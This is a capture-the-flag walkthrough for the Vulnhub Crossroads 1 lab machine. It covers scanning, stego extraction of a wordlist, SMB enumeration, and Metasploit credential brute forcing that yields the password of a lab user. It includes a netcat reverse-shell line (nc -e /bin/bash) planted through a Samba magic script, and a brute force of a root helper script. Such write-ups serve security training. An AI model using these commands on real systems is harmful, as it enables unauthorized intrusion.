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Walkthrough vulnhub Crossroads 1 machine

Hi guys, through this write-up we'll be talking about all the different process that lead to capture all the flags of Vulnhub Crossroads1 machine.

The machine can be downloaded on this link Concerning the virtualisation engine, I used Virtualbox, of course it's the one that is recommended for this machine.

Here's is the description given from Vulnhub about the machine:

  • get flags
  • difficulty: easy
  • about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
  • This works better with VirtualBox rather than VMware

Now that all have been said, let's start:

After starting the machine in virtualbox, we have to look for our target Ip address, so to that we use the command netdiscover


As you can see on the image, our target Ip address is but we'll be using as attacker Ip address

Now then, let's poursue by enumerating services and ports that the target machine is running by using nmap command

nmap -A -Pn-


With the output of nmap command, it's shows that the target machine is running http server and smb server as well. Knowing that, we'll continue our journey by web enumeration in other to gather more information and see if there isn't some interesting files on the web server. so to that, we use dirb command to check eventuals files that might be stored on the web server



So looking to the image, it's possible to see that, there are somes files on the web server. While checking the content of the robot.txt file, it's mentioned inside that the route /crossroad.png is disabled. Of course, our first impression might be to suppose that file should contain the first flag, but looking at it, it's not


So then, as I said earlier, I first download the file and try to see if it's possible that something was hiden inside. To that I used a python package called stegoveritas to extract everthing that the picture might hide. If you do want to install the package stegoveritas on your python environnement, you just have to do pip3 install stegoveritas and there you go. stegoveritas crossroads.png


When the file is done extracting, you'll find in your curent directory a new directory created and named results. Inside this one, there's another directory named keepers in which there are somes files, and among those files we find a wordlist, with it what we might expect is that soon it should come in handy while try to do a brute force attack. bellow the wordlist file captured


Now let's save this wordlist in our repository


After that, we are sure there is no more interesting thing on the side, we can head to smb server side. There, we start as usually with the smb server enumeration. First, we'll check the shared directories on the server their access permission by using smbmap command

smbmap -H


As we can see on the image, all the shared directories have no access permission a guest user. So we have to look for a user who has somehow an access to one of the shared directories. To that, we can use enum4linux or nmap smb enumeration script, but in my case I used enum4linux to find another user who has access to the smb server. Below the command that used



The image beyond shows a fragment of the output of enum4linux command, and we can see on it that there's another user called albert on the target machine. Knowing that, let's try to find his credentials and enumerate the access he might have on the shared directories. We can use a banch of tools to brute force smb creds but in my case I used metasploit auxiliary scanner/smb/smb_login. Using the metasploit auxiliary I just mentionned, we must set our options as shown on the image below


At the end of the execution we'll find as result


Now that we have the user albert creds, we can try to enumerate the kind of access he has on the shared directories with the command below

smbmap -H -u albert -p bradley1


The output of the command shows that the user albert has to smbshare directory with the permissions Read and Write, and had access on his local directory with the permission Read only

So then let's have access to his local directory and check what's inside

smbmount // smb -o username=albert


Inside the local directory of albert, is a file called user.txt which contain our first flag


While having a look to the smbshare directory, we notice that there is a smb.conf file inside. Looking at it, it's mentionned in the smbshare configuration that a user albert might be able to execute a magic script called


Knowing that, we can take advantage of it to create a reverse TCP shell and have an access to target machine. For that, all we have to do is used netcat command and create a reverse shell to the attacker machine, by simply puting in the this line below

echo nc -e /bin/bash 4444 > (we shoud mentionned that the Ip address here is the Ip of the attacker machine)


Before sending the payload to target machine, we have to start listening on the port we mentionned in the, using the command nc -lvp 4444. After that, we are ready to go!!


On the attacker server we'll have this


The command that is highlighted on the is used to gain a stable shell terminal on our machine.

By checking the local directory of the user albert, we can see there's a script called beroot, when we execute that script, it's ask to us to enter a password for the root. Here is where we'll use the wordlist we retrieved form the crossroads image to brute force the script beroot. I write for that a small script to brute the script, which I put on this repository for those who are interested.

To upload the script and the wordlist on the target machine, we just have to use a python module http.Server to create a local http server and then use wget tool to download it on the target machine. Know that you'll have to process a little bit your wordlist before using it in the script or rather use the wordlitst I put on this repository


Now let's execute the script we just downloaded and crack the beroot script


Everything we have to do now and find the second and last flag of this machine, is to follow the instruction given to at the end of the cracking


Here is the end of this walkthrough, I hope you guys enjoyed it. Thank you for reading!!!


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